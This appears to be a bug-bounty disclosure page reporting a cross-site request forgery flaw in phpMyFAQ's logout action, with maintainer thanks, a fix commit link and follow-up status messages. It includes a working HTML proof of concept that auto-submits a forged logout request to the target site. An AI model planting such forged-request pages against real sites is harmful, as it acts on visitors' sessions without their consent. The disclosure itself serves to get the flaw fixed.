Cross-Site Request Forgery (CSRF) in thorsten/phpmyfaq
Valid
Reported on
Jul 26th 2022
Description
An attacker is able to log out a user if a logged-in user visits the attacker's website.
Proof of Concept
PoC.html
<html>
<body>
<script>history.pushState('', '', '/')</script>
<form action="http://roy.demo.phpmyfaq.de/?action=logout">
<input type="submit" value="Submit request" />
</form>
<script>
document.forms[0].submit();
</script>
</body>
</html>
Impact
This vulnerability is capable of forging users to unintentional logout.
More details
One way GET could be abused here is that a person (competitor perhaps:) placed an image tag with src="<your logout link>" anywhere on the internet, and if a user of your site stumbles upon that page, he will be unknowingly logged out. This is why it should be a POST with a CSRF token.
Note
While this cannot harm a user's account, it can be a great annoyance and is a valid CSRF.
We are processing your report and will contact the
thorsten/phpmyfaq
team within 24 hours.
5 months ago
We have contacted a member of the
thorsten/phpmyfaq
team and are waiting to hear back
5 months ago
The researcher has received a minor penalty to their credibility for miscalculating the severity: -1
The researcher's credibility has increased: +7
Thanks for the hint, I fixed that in the backend some months ago, but missed the one in the frontend. Here's the fix: https://github.com/thorsten/phpMyFAQ/commit/3af0bbb0856fe821ba20df22884fc7a7b95c3bcb
The researcher's credibility has slightly increased as a result of the maintainer's thanks: +1
We have sent a
fix follow up to the
thorsten/phpmyfaq
team.
We will try again in 7 days.
5 months ago
We have sent a
second
fix follow up to the
thorsten/phpmyfaq
team.
We will try again in 10 days.
5 months ago
We have sent a
third and final
fix follow up to the
thorsten/phpmyfaq
team.
This report is now considered stale.
5 months ago
to join this conversation